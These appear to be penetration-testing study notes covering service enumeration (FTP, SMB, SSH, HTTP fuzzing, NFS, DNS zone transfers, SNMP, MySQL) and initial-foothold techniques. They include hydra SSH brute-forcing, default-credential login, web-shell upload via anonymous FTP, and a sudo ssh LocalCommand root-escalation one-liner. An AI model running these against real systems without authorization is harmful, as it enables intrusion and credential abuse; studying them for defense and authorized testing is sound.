***
## **Contents**

### **[Scanning and Enumeration](#scanningandenum)**

* **[Enumerating FTP/TFTP](#enumeratingftptftp)**
* **[Enumerating SMB](#enumeratingsmb)**
* **[Enumerating SSH](#enumeratingssh)**
* **[Enumerating HTTP and HTTPS](#enumeratinghttpethttps)**
* **[Enumerating NFS](#enumeratingnfs)**
* **[Enumerating DNS](#enumeratingdns)**
* **[Enumerating SNMP](#enumeratingsnmp)**
* **[Enumerating MySQL](#enumeratingmysql)**
* **[Other Enumeration Techniques](#otherenum)**

### **[Initial Footholds (Ports)](#portinitialfootholds)**

* **[21/TCP: File Transfer Protocol (FTP)](#ftp)**
* **[22/TCP: Secure Shell (SSH)](#ssh)**
* **[23/TCP: Telnet](#telnet)**
* **[69/UDP: Trivial File Transfer Protocol (TFTP)](#tftp)**
* **[161/UDP: Simple Network Management Protocol (SNMP)](#snmp)**
* **[445/TCP: Server Message Block (SMB)](#smb)**
* **[873/TCP: rsync](#rsync)**
* **[1433/TCP: Microsoft SQL (ms-sql-s)](#ms_sql_s)**
* **[3306/TCP: MySQL](#mysql)**
* **[3389/TCP: Microsoft Terminal Services](#msterminalservices)**
* **[6379/TCP: Remote Dictionary Server (Redis)](#redis)**
* **[27017/TCP: MongoDB](#mongodb)**

### **[Initial Footholds (Web)](#webinitialfootholds)**

#### **<u>[Command Injections](#commandinjections)</u>**

* **[Detection](#cmdinjdetection)**
* **[Bypassing Front-End Validation](#cmdinjbypassingfevalid)**
* **[Identifying Filters](#cmdinjidentfilters)**
* **[Bypassing Space Filters](#cmdinjbypasspacefilters)**
* **[Bypassing Other Blacklisted Characters](#cmdinjbypassothblkchar)**
* **[Bypassing Blacklisted Commands](#cmdinjbypassblkcmds)**
* **[Advanced Command Obfuscation](#cmdinjadvcmdobfus)**
* **[Command Injection Prevention](#cmdinjprev)**

#### **<u>[File Inclusion](#fileinclusion)</u>**

* **[Local File Inclusion](#localfileinclusion)**
* **[Basic Bypasses](#basicbypassesfiledisc)**
* **[PHP Filters](#phpfiltersfiledisc)**
* **[PHP Wrappers (RCE)](#phpwrappersrce)**
* **[Remote File Inclusion (RCE)](#rfirce)**
* **[LFI and File Uploads (RCE)](#lfiandfileuploadsrce)**
* **[Log Poisoning (RCE)](#lfilogpoisoningsrce)**
* **[Automated Vulnerability Scanning](#lfivulnscanning)**
* **[File Inclusion Examples](#lfiexamplestorce)**
* **[File Inclusion Prevention](#fiprevention)**

#### **<u>[Cross-Site Scripting](#xss)</u>**

* **[Stored XSS](#storedxss)**
* **[Reflected XSS](#reflectedxss)**
* **[DOM Attacks](#domattacks)**
* **[Defacing](#xssdefacing)**
* **[Phishing](#xssphishing)**
* **[Session Hijacking](#xsssessionhijacking)**
* **[XSS Prevention](#xssprevention)**

#### **<u>[File Upload Attacks](#fileuploadattacks)</u>**

* **[Absent Validation](#fileuploadabsvalid)**
* **[Upload Exploitation](#fileuploadupexpl)**
* **[Client-Side Validation (Bypassing Filters)](#fileuploadclientvalid)**
* **[Blacklist Filters (Bypassing Filters)](#fileuploadblkfilt)**
* **[Whitelist Filters (Bypassing Filters)](#fileuploadwhitefilt)**
* **[Type Filters (Bypassing Filters)](#fileuploadtypefilt)**
* **[Limited File Uploads](#fileuploadlimited)**
* **[Other Upload Attacks](#fileuploadother)**

### **[Linux](#linuxportion)**

#### **<u>[Introduction to Linux](#linuxintroos)</u>**

* **[Editing with Vi and Vim](#editingwithvi)**
* **[Creating/Deleting User Accounts](#crdeluseraccountslinux)**
* **[Managing Permissions and Sudo Users](#managingpermissionsandsudousers)**
* **[Groups](#linuxgroups)**
* **[Passwords and Shadow Hashes](#pwandshdwhashes)**
* **[Networking Configuration](#explntwkconf)**
* **[Using Network Service with Netcat](#usingntwksrvwnc)**
* **[Web Services with Apache](#websrvwapche)**
* **[Router and Gateway Configuration](#routerconfig)**
* **[SSH Service Basics](#sshservbasics)**
* **[SSH Service Through the Router](#sshservthrurouter)**
* **[DNS Service Basics](#dnssrvbasics)**
* **[DNS Service Additional Zones](#dnssrvaddzones)**
* **[DNS Service Through the Router](#dnssrvthrurouter)**
* **[Rsync and Cron Service Basics](#rsyncetcronservbasics)**
* **[Rsync and Cron Automatic Secure Backups](#rsyncetcronautsecbackups)**
* **[Intro to Firewalls with UFW](#introtofwswufw)**
* **[Active Connection Defense](#activecondefense)**
* **[MikroTik](#mikrotik)**
* **[FTP Service Basics](#ftpservbasicsncae)**
* **[MySQL Service Basics](#mysqlservicebasicsncae)**

***
<a id="scanningandenum"></a>

## **Scanning and Enumeration**

<a id="enumeratingftptftp"></a>

### **`Enumerating FTP/TFTP`**

In an **`Active FTP`** session, two channels are opened. With this FTP connection, two channels are opened:
* The client and server establish a control channel through **TCP port 21.** The client sends commands to the server and the server returns status codes.

* Both communication participants can establish the data channel via **TCP port 20.** This channel is used exclusively for data transmission, and the protocol watches for errors during this process. If a connection is broken off during transmission, the transport can be resumed after re-established contact. 

If a firewall protects the client, the server cannot reply because all external connections are blocked. Because of this, **`Passive FTP Mode`** was developed. With this FTP connection, the server announces a port through which the client can establish the data channel; since the client initiates the connection in this method, the firewall does not block the transfer. 

The FTP knows different commands and status codes; not all of these commands are consistently implemented on the server. For example, the client-side instructs the server-side to upload or download files, organize directories or delete files. The server responds in each case with a status code that indicates whether the command was successfully implemented. 

Usually, when accessing FTP on a server, credentials are needed. It is important to note that FTP is a clear-text protocol that can sometimes be sniffed if conditions on the network are right; however, some servers offer **anonymous FTP,** where the server operator allows any user to upload or download files via FTP without using a password. Since there are security risks associated with this type of public FTP server, the options for users are usually limited.

<br>

**<u>TFTP</u>**

TFTP is simpler than FTP and performs file transfers between client and server processes. However, it does not provide user authentication and other valuable features supported by FTP. While FTP uses TCP, TFTP uses **UDP port 69,** making it an unreliable protocol and causing it to use UDP-assited application layer recovery. 
* TFTP does not support protected login via passwords and sets limits on access based solely on the read and write permissions of a file in the OS
   * This leads to TFTP operating exclusively in directories and with files that have been shared with all users and can be read and written globally
8 Because of the lack of security, TFTP should only be used in local and protected networks

The following are a few commands of TFTP:
* **`connect`:**  Sets the remote host, and optionally the port, for file transfers

* **`get`:** Transfers a file or set of files from the remote host to the local host

* **`put`:** Transfers a file or set of files from the local host onto the remote host

* **`quit`:** Exists tftp

* **`status`:** Shows the current status of tftp, including the current transfer mode (ASCII or binary), connection status, time-out value, etc

* **`verbose`:** Turns verbose mode, which displays additional information during the file transfer, on or off

> Unlike the FTP client, TFTP does not have directory listing functionality

<br>

**<u>Default Configuration</u>**

One of the most used FTP servers on Linux distros is **`vsFTPd`.** The default configuration of vsFTPd can be found in **`/etc/vsftpd.conf`,** and some settings are already predefined by default. To install vsFTPd, the following command can be executed:
```bash
sudo apt install vsftpd 

```
To look at the active configurations, the following command can be executed:
```bash
cat /etc/vsftpd.conf | grep -v "#"

```

<center>

|Setting|Description|
|-------|-----------|
|listen=NO|Run from inetd or as a standalon daemon|
|listen_ipv6=YES|Listen on IPv6?|
|anonymous_enable=NO|Enable Anonymous access?|
|local_enable=YES|Allow local users to login?|
|dirmessage_enable=YES|Display active directory messages when users go into certain directories?|
|use_localtime=YES|Use local time?|
|xferlog_enable=YES|Activate logging of uploads/downloads?|
|connect_from_port_20=YES|Connect from port 20?|
|secure_chroot_dir=/var/run/vsftpd/empty|Name of an empty directory|
|pam_service_name=vsftpd|This string is the name of the PAM service vsftpd will use|
|rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem|The last three options specify the location of the RSA certificate to use for SSL encrypted connections.
|rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key||	
|ssl_enable=NO||	

</center>

The `/etc/ftpusers/` file is used to deny certain users access to the FTP service. The users within this file are not permitted to log in to the FTP service, even if they exist on the Linux system.


<br>

**<u>Dangerous Settings</u>**

One of the authentication mechanisms is the **anonymous** user. THis is often used to allow everyone on the internal network to share files and data without accessing each other's computers. With vsFTPd, the optional settings that can be added to the configuration file for the anonymous login look as follows:

* **`anonymous_enable=YES`:** Allows anonymous login

* **`anon_upload_enable=YES`:** Allows anonymous user to upload files

* **`anon_mkdir_write_enable=YES`:** Allows anonymous user to create new directories

* **`no_anon_password=YES`:** Does not ask the anonymous user for a password

* **`anon_root=/home/username/ftp`:** The directory of the anonymous user

* **`write_enable=YES`:** Allows the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE

With the standard FTP client, the FTP server can be accessed with the anonymous user if the settings shown above have been used. The use of the anonymous account can occur in internal environments and infrastructures where the participants are all known. Access to this type of service can be set temporarily or with the setting to accelerate the exchange of files. 

To log in with the anonymous credentials, just type **anonymous** as the username and password. 

Many commands are similar to that of Linux, but with some additions. For example, `ls -R` recursively lists files. This may or may not be enabled on the machine. This may be useful as it can potentially disclose the users and groups on the machine. If the `hide_ids` option is set to YES, then this will show ftp as both the user and group to mask UIDs and GUIDs.
* If the UIDs are not hidden, then an attacker can brute force a password to access the machine through ssh or another remote connection protocol.


From the local machine, it is also possible to download all of the files and folders that are accessible on the remote machine all at once. This, however, may trigger alarms because a "normal" user would likely never do this:
```bash
wget -m --no-passive ftp://anonymous:anonymous@<IP Address>
```
* If this command is executed, a new directory will be created with the name of the IP address of the target. All downloaded files are stored there, which can be inspected locally. 

<br>

**<u>Footprinting the Service</u>**

The NSE on nmap can help with the footprinting process. Before this is used, update the NSE database.
```bash
sudo nmap --script-updatedb

```

Once the NSE database is updated, scan FTP (port 21) on nmap. Of course, the initial scans should scan the most common ports, or even all of the ports, but if FTP is an available service on the machine, a more in-depth scan of FTP against the machine can be performed:
```bash
sudo nmap -sV -p21 -sC -A <IP Address>
```
The default script scan (-sC) is based on the services' fingerprints, responses, and standard ports. Once nmap has detected the service, it executes the marked scripts one after the other, providing different information. 


Besides interacting with the FTP server with the ftp command, **netcat,** **openssl,** and **telnet** may also be used:
```bash
nc -nv <IP address> 21

telnet <IP address> 21

openssl s_client -connect <IP address>:21 -starttls ftp
```

If the FTP server runs with TLS/SSL encryption, the client must handle TLS/SSL, so the **openssl** command is used for communication. This also displays the SSL certificate upon successful connection. 

<a id="enumeratingsmb"></a>

### **`Enumerating SMB`**

SMB can technically use both port 139 and 445, but modern versions of SMB primarily use 445. Therefore, when initially scanning the device and either or both of these ports are running on the machine, run a more specific scan with the default scripts:
```bash
sudo nmap <IP address> -sV -sC -p139,445

```

If the nmap scans don't yield enough information, then `rpcclient` can be used. Through RPC client, many different requests can be used to execute specific functions on the SMB server to get information:
```bash
rpcclient -U "" <IP address>

srvinfo     #server information

enumdomains    #enumerate all domains that are deployed on the network

querydominfo   #provides domain, server, and user information of deployed domains

netshareenumall   #enumerates all available shares

netsharegetinfo <share> #provides information about a specific share

enumdomusers      #enumerates all domain users

queryuser <RID>   #provides information about a specific user

```

Besides this, impacket-samrdump.py, smbmap, and crackmapexec can be used

<br>

Running nmap with the `-A` flag gives the SMB version. If it is open, the version can disclose potential vulnerabilities. If nmap does not help discover the SMB version, the following msfconsole modules may help. For the second option, be sure to look through the potential modules and choose the one that fits the best

<u>msfconsole</u>

```bash
msfconsole> use auxiliary/scanner/smb/smb_version
msfconsole> set RHOST <IP Address>
msfconsole> run

or

msfconsole> search auxiliary/scanner/smb/
```

<br>

**<u>smbclient</u>**

**smbclient** can be used to connect to a file share. If anonymous access is enabled, it does not mean that each share will allow anonymous access
* `-L` lists out files
* `IPC$` is not valuable, but connecting to it is useful for PoC. 
* Specifying a share after the IP address lists the contents of that specific share
```bash
smbclient -L \\\\<IP Address>\\

smbclient \\\\<IP Address>\\SHARE$

```

To use Linux commands when directly connected to SMB, prepend any command by `!`, like `!ls` to list directory contents



<a id="enumeratingssh"></a>

### **`Enumerating SSH`**

SSH can be enumerated, but finding immediate root access from SSH is seldom seen. It is still a good idea to enumerate SSH for specific version information. Trying to login via SSH is considered an exploitation attempt, however. 
```bash
ssh <IP Address>
```

When logging in, depending on the age of the machine, different results may show up. Sometimes the terminal will ask for the key, the login or it will offer a matching key exchange. If the machine offers a cipher, then continue to the second step. This will prompt the user to enter the machine's password, but sometimes a banner will show up and provide version information. 
```bash
ssh <IP Address> -oKexAlgorithms=+{matching key exchange}

ssh IP Address -oKexAlgorithms=+{matching key exchange} -c {cipher}
```
     
<br>     

msfconsole can also be used to enumerate ssh
```bash
msfconsole> use auxiliary/scanner/ssh/ssh_login
msfconsole> search auxiliary/scanner/ssh
```

<a id="enumeratingimapetpop3"></a>

### **`Enumerating IMAP/POP3`**

<a id="enumeratinghttpethttps"></a>

### **`Enumerating HTTP and HTTPS`**

Default webpages are considered automatic findings because they explain the architecture and client's hygiene. When enumerating websites, it is important to do the following:
* View source code

* Look for additional directories

* Click on links to see if 404 pages redirect or not. If they do not, look at the requested URL, server name, and host name.

* Server headers may also disclose server information

<br>

**nikto:** Examines a web server to find potential problems and security vulnerabilities, including server and software misconfigurations, default files and programs, insecure files and programs, outdated servers and programs. 
   * `nikto -h <http://domain>`

<br>

**dirb:** Web content scanner that looks for existing web objects.
   * `dirb <http://domain> <wordlist files> [-X extensions | .html, .php, etc]`

<br>

**dirbuster:** This is essentially the GUI version of dirb; it is specific to directory and file busting
   * Make sure the TARGET URL is in the format of `url:<port>/`
   * Use any wordlist, but make sure it contains common directories.
      * `directory-list-2.3-` has pretty common directory names
   * Separate file extensions with commas

<br>

**gobuster:** Used to brute force directories and files in websites, DNS subdomains, virtual host names, open S3 buckets, and TFTP servers. The example shows the keyword fuzz command
   * `dir` Uses directory/file enumeration mode
   * `dns` Uses DNS subdomain enumeration mode
   * `fuzz` Replaces the FUZZ keyword in the URL, headers and the request body
   * `vhost` Uses VHOST enumeration mode
      * `gobuster -u <http://FUZZ.domain.com> -w <wordlist> fuzz`

<br>

**assetfinder:** Searches for domains that are related to the searched domain. If these domains are out of scope, use the `--subs-only` flag
   * `assetfinder [--subs-only] <domain.com>`

<br>

**amass:** Shows attack surface mapping and asset discovery.
   * `amass enum -d <domain.com>`

<br>

**ffuf:** Automated tool to fuzz the web application's individual components or a web page. If a 200 response code is returned to one of the fuzzed webpages, then the page exists on the web server. 
   * **Directory Fuzzing**
      * `ffuf -w <wordlist>:FUZZ -u <http://domain:port/>FUZZ`
   * **Extension Fuzzing:** Change *page* for a known file name, while fuzzing the extension.
      * `ffuf -w <wordlist>:FUZZ -u <http://domain:port/>pageFUZZ`
   * **Page Fuzzing:** Change *php* for a known extension, while fuzzing the file name.
      * `ffuf -w <wordlist>:FUZZ -u <http://domain:port/>FUZZ.php`
   * **Recursive Fuzzing:** Change *php* for any desired extension. Also can add to the recursion depth.
      * `ffuf -w <wordlist>:FUZZ -u <http://domain:port/>FUZZ -recursion -recursion-depth 1 -e .php -v`
   * **Subdomain Fuzzing**
      * `ffuf -w <wordlist>:FUZZ -u <http://FUZZ.domain:port/>`
   * **VHOST Fuzzing:** Similar to subdomain fuzzing. *-fs* is used to filter HTTP response size
      * `ffuf -w <wordlist>:FUZZ -u <http://FUZZ.domain:port/> -H 'Host: FUZZ.domain.com' -fs xxx`
   * **Parameter Fuzzing (GET)**
      * `ffuf -w <wordlist>:FUZZ -u <http://FUZZ.domain:port/>directory/file.ext?FUZZ=key -fs xxx`
   * **Parameter Fuzzing (POST)**
      * `ffuf -w <wordlist>:FUZZ -u <http://FUZZ.domain:port/>directory/file.ext -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx`
   * **Value Fuzzing**
      * `ffuf -w <wordlist>:FUZZ -u <http://FUZZ.domain:port/>directory/file.ext -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx`

<a id="enumeratingnfs"></a>

### **`Enumerating NFS`**

NFS is a network file system that has the same purpose as SMB, but uses an entirely different protocol. It uses **TCP/UDP ports 2049** and **TCP/UDP port 111.** NFS is used between Linux and Unix systems, which means that NFS clients cannot communicate directly with SMB servers. 
* NFSv3 authenticates the client computer
* NSFv4 the user must authenticate

The most common authentication is via UNIX UID/GID and group memberships, which is why this syntax is most likely to be applied to the NFS protocol. However, the client and server do not necessarily have to have the same mappings of UID/GID to users and groups, and the server does not need to confirm. This is why NFS should only be used with this authentication method in trusted networks. 

<br>

When footprinting NFS, the TCP ports 111 and 2049 are essential. Information about the NFS service and the host can be gathered via RPC as well:
```bash
sudo nmap <IP address> -p111,2049 -sV -sC

```

The rpcinfo NSE script retrieves a list of all currently running RPC services, their names and descriptions, and the ports they use. This enables attackers to check whether the target share is connected to the network on allr equired ports. Also, for NFS, nmap has some NSE scripts that can be used for the scans. These can potentially disclose the contents of the share and its stats:
```bash
sudo nmap --script nfs* <IP address> -sV -p111,2049

```
Once an NFS service has been discovered, it can be mounted to the location machine. For this, a new empty folder can be created to which the NFS share will be mounted. Once mounted, navigate to it and view the contents:
```bash
showmount -e <IP address>
# this will output the files that can be pulled from the machine

mkdir target-NFS
sudo mount -t nfs <IP address>:/ ./target-NFS/ -o nolock
cd target-NFS

```
Within these files, the rights, usernames, and groups to whom the shown and viewable files belong to will be accessible. Once the usernames, group names, UIDs, and GUIDs are gathered, an attacker can create them on their local machine and adapt them to the NFS share to view and modify the files
```bash
ls -l mnt/nfs/ #contents with usernames and group names

ls -n mnt/nfs/ #contents with UIDs and GUIDs

```

NFS can be used for further escalation; for example, if an attacker has access to the system via ssh and they want to read files from another folder that a specific user can read, they would need to upload a shell to the NFS share that has the SUID of that user and then run the shell via the SSH user. 

After all the information is obtained, the NFS share can be unmounted:
```bash
sudo umount ./target-NFS
```

<a id="enumeratingdns"></a>

### **`Enumerating DNS`**

Different DNS records are used for the DNS queries, which all have various tasks; moreover, separate entries exist for different functions since different servers can be set up for a domain. The following lists common DNS records:
* **`A`:** Returns an IPv4 address of the requested domain as a result

* **`AAAA`:** Returns an IPv6 address of the requested domain

* **`MX`:** Returns the responsible mail servers as a result

* **`NS`:** Returns the DNS servers (nameservers) of the domain

* **`TXT`:** This record can contain various information. The all-rounder can be used, i.e., to validate the Google Search Console or validate SSL certificates. In adition, SPF and DMARC entries are set to validate mail traffic and protect it from spam

* **`CNAME`:** THis record serves as an alias for another domain name. If an administrator wants www.domain.com to point to the same IP as domain.com, they would create an A record for domain.com and a CNAME record for www.domain.com

* **`PTR`:** Contains a reverse lookup. It converts IP addresses into valid domain names

* **`SOA`:** Provides information about the corresponding DNS zone and email address of the administrative contact
   * Located in a domain's zone file and specifies who is responsible for the operation of the domain and how DNS information for the domain is managed. 
```bash
dig soa domain.com
# The period is replaced by an @ sign in the email address. 

```

**<u>Footprinting DNS</u>**

The footprinting at DNS servers is done as a result of the sent requests. First of all, **the DNS server can be queried as to which other name servers are known.** This can be done using the NS record and the specification of the DNS server that is to be queried using the `@` character. This is because if there are other DNS servers, they can also be used query the records. However, other DNS servers may be configured differently, and may be permanent for other zones:
```bash
dig ns <domain.com> @<IP address>

```

Sometimes it is also possible to **query a DNS server's version** using a class CHAOS query and type TXT; however, this entry must exist on the DNS server. This can be done as follows:
```bash
dig CH TXT version.bind <IP address>

```

**The ANY option can be used to view all available records.** This will cause the server to show the user querying all the available entries that it is willing to disclose. It is important to note that not all entries from the zones will be shown:
```bash
dig any <domain.com> @<IP address>

```

To view **additional information, including more subdomains,** the following commands can be executed:
```bash
dig axfr <domain.com> @<IP address>

dig axfr internal.<domain.com> @<IP address>

```

The individual `A` records with the hostnames can also be found out through a brute force attack. This can be done with a list of possible hostnames, which can be found in Seclists. The following automates a subdomain brute force:
```bash
for sub in $(cat /seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.<domain.com> @<IP address> | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

```

Besides this, `dnsenum` can automate this process:
```bash
dnsenum --dnsserver <IP address> --enum -p 0 -s 0 -o subdomains.txt -f /seclists/Discovery/DNS/subdomains-top1million-110000.txt <domain.com>
```

<a id="enumeratingsnmp"></a>

### **`Enumerating SNMP`**

While SNMP was created to monitor network device, it also transmits control commands using agents over **`UDP port 161`.** The client can set specific values in the device and change options and settings with these commands. It is always the client who actively requests information from the server; SNMP also enables the use of **`"traps" over UDP port 162`,** which are data packets sent from the SNMP server to the client without being explicitly requested. If a device is configured accordingly, an SNMP trap is sent to the client once a specific event occurs on the server-side. For the SNMP client and server to exchange the respective values, the available SNMP objects must have unique addresses known on both sides; this addressing mechanism for successfully transmitting data and network monitoring using SNMP.

Before getting into footprinting, the following concepts must be understood:
* **`MIB`:** To ensure that SNMP access works across manufacturers and with different client-server combinations, the **Management Information Base (MIB)** was created. MIB is an independent format for storing device information.
  * A MIB is a text file in which all querybale SNMP objects of a device are listed in a standardized tree hierarchy. It contains at least one **Object Identifier (OID),** which, in addition to the necessary unique address and a name, also provides information about the type, access rights, and a description of the respective object

  * MIB files are written in the **Abstract Syntax Notation One (ASN.1)** based ASCII text format. The MIBs do not contain data, but they explain where to find which information and what it looks like, which returns values for the specific OID, or which data type is used.

* **`OID`:** An OID represents a node in a hierarchical namespace. A sequence of numbers uniquely identifies each node, allowing the node's position in the tree to be determined. The longer the chain, the more specific the information. Many nodes in the OID tree contain nothing except references to those below them
  * The OIDs consist of integers and are usually concatenated by dot notation. A user can look up many MIBs for the associated OIDs in the **Object Identifier Registry.**

* **`Community Strings`:** Community strings can be seen as passwords that are used to determine whether the requested information can be viewed or not. 
  * It is important to note that many organizations are still using SNMPv2, as the transition to SNMPv3 can be very complex, but the services still need to remain active. This causes

  * The lack of encryption of the data sent is also a problem because every time the community strings are sent over the network, they can be intercepted and read


The following are potentially encounterable SNMP versions that can be found on machines:
* **`SNMPv1`:** Used for network management and monitoring. Of course, this is the first version of the protocol and is still in use in many small networks. It supports the retrieval of information from network devices, allows for the configuration of devices, and provides traps, which are notifications of events. However, SNMPv1 has no built-in authentication mechanism, meaning anyone accessing the network can read and modify the network data. Besides this, SNMPv1 does not support encryption, so the data can be easily intercepted. 

* **`SNMPv2`:** There are many versions of SNMPv2, but the primary version in use today is **`v2c`,** where the extenction **c** means community-based SNMP. Regarding security, SNMPv2 is on par with SNMPv1 and has been extended with additional functions from the party-based SNMP no longer in use. However, a significant problem with the initial execution of the SNMP protocol is that the community string that provides security is only transmitted in plain text, meaning it has no built-in encryption

* **`SNMPv3`:** In SNMPv3, the security has been increased significantly. This includes authentication and transmission encryption (via PSK) of the data. However, the complexity also increases to the same extent, with significantly more configuration options than v2c. 

<br>

**<u>Footprinting SNMP</u>**

For footprinting SNMP, **`snmpwalk`, `onesixtyone`** and `braa` can be used. snmpwalk is used to query the OIDs with their information; onesixtyone can be used to brute force the names of the community strings since they can be named arbitrarily by the administrator. Since these community strings can be bound to any source, identifying the existing community strings can take some time. Before footprinting with snmpwalk, it is critical to scan the machine with nmap. 
```bash
nmap <IP address> -sV -sC -sU

```
Once this is done, at least the version will be discovered. If there is a misconfiguration, using the community string of **pulic** would yield a lot of useful information. Nevertheless, once the community string is discovered, and granted that the SNMP service does not require authentication, the internal system can be queried for information. 

```bash
snmpwalk -v [1, 2c] -c public <IP address>

```

If the community string is still unknown, **onesixyone** can be used in tandem with a seclist wordlist to identify these community strings:
```bash
sudo apt install onesixtyone

onesixtyone -c /seclists/Discovery/SNMP/snmp.txt <IP address>

```
Often, when certain community strings are bound to specific IP addresses, they are named with the hostname of the host, and sometimes even symbols are added to these names to make them more challenging to identify; however, extensive networks with hundreds of different servers managed with SNMP will likely have some pattern to them. Therefore, different rules can be used to guess them. 

Once a community string is determined, **braa** can be used to brute force the individual OIDs and enumerate the information behind them:
```bash
sudo apt install braa

braa <community string>@<IP>:.1.3.6.*   
```

<a id="enumeratingmysql"></a>

### **`Enumerating MySQL`**

This section covers installing a safe MySQL server, as well as enumerating a remotely hosted MySQL server. 

To install MySQL and review the default configurations, the following commands can be executed:
```bash
sudo apt install mysql-server -y
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'

```
The main security-related options include:
* **`user`:** Sets which user the MySQL service will run as

* **`password`:** Sets the password for the MySQL user

* **`admin_address`:** The IP address on which to listen for TCP/IP connections on the administrative network interface

* **`debug`:** This variable indicates the current debugging settings

* **`sql_warnings`:** This variable controls whether single-row INSERT statements product an information string if warnings occur

* **`secure_file_priv`:** This variable is used to limit the effect of data import and export operations

The first three options are relevent to cybersecurity because the entries are made in plain text. Often, the rights for the configuration file of the MySQL server are not assigned correctly. If there is another way to read files or even a shell, the file can be seen where the username and password are stored for the MySQL server. If there are no other security measures to prevent unauthorized access, the entire database can be exposed. 

Similarly, the debug and sql_warnings options provide verbose information output in case of errors, which are essential for the administrator but should not be seen by others. This information often contains sensitive content, which could be detected by trial and error to identify further attack possibilities. These error messages are often displayed directly on web apps. Accordingly, the SQLi could be manipulated even to have the MySQL server execute system commands.

<br>

**<u>Footprinting MySQL</u>**

MySQL should never be accessible from an external network, but in many cases, it is misconfigured to allow such connections. MySQL runs on **TCP port 3306.** Once the initial system scan detects this service, a more specific scan can be executed against this service. Even if nmap doesn't detect that this port is open, it is still worth running the following scan: 
```bash
sudo nmap <IP address> -sV -sC -p3306 --script mysql*

```

Valid usernames may be yielded from this scan, depending on the results. Regardless, manually confirm the information obtained because some of the information might be a false-positive. These accounts can be tested without a password with the following command:
```bash
mysql -u <username> -h <IP address>

```

If a password is found for a specific account, and the account is able to use MySQL, perform the following command to gain access to the machine:
```bash
mysql -u <username> -p<password> -h <IP address>

```

Once inside the MySQL service, the following commands can be used to enumerate the system:
```bash
MySQL [(none)]> show databases;    

MySQL [(none)]> select version();  

MySQL [(none)]> use <database>;

MySQL [(<database>)]> show tables;

MySQL [(<database>)]> show columns from <table>;	  #shows all columns in the selected database.

MySQL [(<database>)]> select * from <table>;	      #shows everything in the desired table.

MySQL [(<database>)]> select * from <table> where <column> = "<string>";    #search for needed string in the desired table.

```

There may be several existing databases on the MySQL server. The most important databases for the MySQL server are the **sytem schema `sys`** and **information schema `information_schema`.** The system schema contains tables, information, and metadata necessary for management. The information schema also contains metadata; however, this metadata is mainly retrieved from the system schema database. The reason for the existence of these two is the established ANSI/ISO standard. System schema is a Microsoft system catalog for SQL servers and contains much more information than the informaiton schema. 

<a id="otherenum"></a>

### **`Other Enumeration Techniques`**

<u>Network-Related Enumeration</u>

<center>

|Tool|Information|Commands|
|----|-----------|--------|
|**arp-scan**|Linux tool that looks for devices on the local network. It sends ARP requests to discover all active devices on the local network|`sudo arp-scan -l`|
|**netdiscover**|Uses arp to detect all of the machines on the network. The `-r` flag is used to detect all of the devices on the specified subnet|`sudo netdiscover` or `sudo netdiscover -r <IP address range> /CIDR`|
|**traceroute (Linux)** or **tracert (Windows)**|Shows mapping between two devices. This is better on Linux because ICMP echo packets are filtered|`traceroute <IP Address>`|
|**netstat**|Shows IP addresses that are communicating to the local device and what IP addresses the local device is communicating to; essentially network statistics|`-a` shows all active connections; `-b (Windows)` associates Windows binary with the IP address conversation; `-n` shows IP addresses without resolving names; `-r` shows the device's routing table|
|**dnsenum**|Enumerates DNS information|`dnsenum <domain.com>`|
|**hping3**|Allows crafting of packets to be sent across the network. Almost everything (IP, TCP, UDP, ICMP values) can be modified. This can lead to a DoS|`sudo hping3 --destport <Port> <IP Address>`|


</center>




***
<a id="portinitialfootholds"></a>

## **Initial Footholds (Ports)**

The following are potential attacks that can be performed based on the results from the network enumeration. Again, searchsploit should be run first to see if there are any known vulnerabilities on a particular service or version of a service.

<a id="ftp"></a>

### **`21/TCP: File Transfer Protocol (FTP)`**

```bash
ftp <IP Address>
```

If anonymous FTP login is allowed, login as **anonymous** and enter **anonymous** as the password. 
* Look through directories for interesting files for further exploitation

* Try to upload and delete files
   * If the machine has an HTTP/HTTPS server, put a shell in a directory that can be accessed through the web. Depending on the server, different extensions must be created for the shell (asp, apx, sh, exe, etc)

<a id="ssh"></a>

### **`22/TCP: Secure Shell (SSH)`**

```bash
ssh <IP Address>
```

If a username is known and the private key is found, it is possible to log into their account:
```bash
1. chmod 400 id_rsa

2. ssh -i id_rsa <username>@<Target IP>
```
<br>

If the password is known but the username is unknown, it is possible to brute force account access with a common username list:
```bash
hydra -L <wordlist> -p "<Password>" <Target IP> ssh
```

<br>

While connected to an account via ssh, it is possible to view the listening local ports. The following command shows listening TCP sockets on the machine, but does not resolve the service names (to resolve service names, do not specify `n` in the flag). Once the services are discovered, try to access them via the SSH connection; if these services cannot be accessed, tunnel the SSH connection to the location machine, AKA **`Local Port Forwarding`** (#2)
```bash
1. ss -tln

2. ssh -L <Any Port>:localhost:22 <username>@<Target IP>
```
* In step #2, the SSH client will establish a secure connection to the remote SSH server, and it will listen for incoming connections on the specified port. When a client connects to the local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running it on the local machine. *Through this command, SSH will open up a socket on the local machine on the specified port*

<br>

The following command shows **`Dynamic Port Forwarding`.** This uses a single local port and dynamically assigns remote ports for each connection. If trying to use a local service on the SSH connection, this will error out because a target port was not specified for the traffic to be directed to, meaning that the service sends traffic into the established local socket on the specified port, but never reaches the service on the target machine. For this to work, proxychains must be used in tandem:
```bash
ssh -D <Port> <username>@<Target IP>

proxychains psql -U <username> -h localhost -p 5432
```

<br>

If a user can run **/usr/bin/ssh * as root**, the following command can be run to attempt to escalate privileges. The username should be the user that is attempting to achieve the privilege escalation:
```bash
sudo /usr/bin/ssh -v -o PermitLocalCommand=yes -o 'LocalCommand=/bin/bash' <username>@127.0.0.1
```


<a id="telnet"></a>

### **`23/TCP: Telnet`**

```bash
telnet <IP Address>
```

If Telnet is running on the target machine, first try to log in with default credentials. Search for default credentials based on the telnet version, or try common ones like admin:admin, root:root, administrator:administrator, etc. 

Once logged in, snoop through all of the files. 

<a id="tftp"></a>

### **`69/UDP: Trivial File Transfer Protocol (TFTP)`**

Essentially the less secure, UDP version of FTP

